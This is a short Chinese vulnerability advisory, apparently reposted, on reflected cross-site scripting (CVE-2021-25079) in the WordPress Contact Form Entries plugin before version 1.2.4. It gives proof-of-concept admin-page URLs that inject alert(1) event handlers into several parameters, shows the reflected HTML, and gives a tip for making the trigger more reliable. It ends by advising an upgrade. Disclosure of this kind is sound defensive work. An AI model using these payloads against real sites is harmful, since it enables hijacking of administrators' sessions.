WordPress Contact Form Entries Cross 跨站脚本攻击

2022-01-15 01:22:50 浏览数 (1)

版本: < 1.2.4

CVE : CVE-2021-25079

参考:

https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63

https://secsi.io/blog/cve-2021-25079-multiple-reflected-xss-in-contact-form-entries-plugin/

vxcf_leads 管理员页面的几个参数容易受到反射跨站点脚本漏洞的攻击。

代码语言:javascript复制
GET /wp-admin/ admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir  

返回数据库中已保存条目的列表。 form_id 值反映在 < form_id 参数未经过过滤,因此可以注入任意值。

代码语言:javascript复制
http://example.com/wp-admin /admin.php?page=vxcf_leads&form_id=cf_5e1kpc" onmouseover=alert(1) ne97l&status&tab=entries&search&order=desc&orderby=fir  

允许在输入表单中注入 onmouseover

代码语言:javascript复制
<input class="hide-column-tog" name="cf_5e1kpc" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" type="checkbox" id="cf_5e1kpc" onmouseover=alert(1) ne97l-vxvx-vxurl-hide" value="cf_5e1kpc" onmouseover=alert(1) ne97l-vxvx-vxurl" checked='checked' />Source</label><label>

通过在 click 元素内移动鼠标,漏洞被触发。即使该漏洞似乎需要用户在输入元素上移动鼠标,也可以通过注入一个“样式”部分来改进攻击,该部分可以扩展具有大宽度和高度的输入元素。这样,当用户点击链接时,就会执行javascript代码。 status 参数容易受到最危险的 XSS 攻击:只需发送以下请求

代码语言:javascript复制
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status=b9zrb-->g482f&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date    

将执行 XSS 漏洞. order、orderby 和 search 参数也容易受到 XSS 攻击:

代码语言:javascript复制
http://example.com/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=desc&orderby=fir ihj17"accesskey="x"onclick="alert(1)"//v9tdt 

解决方法: 将联系表条目升级到版本 1.2.4

0 人点赞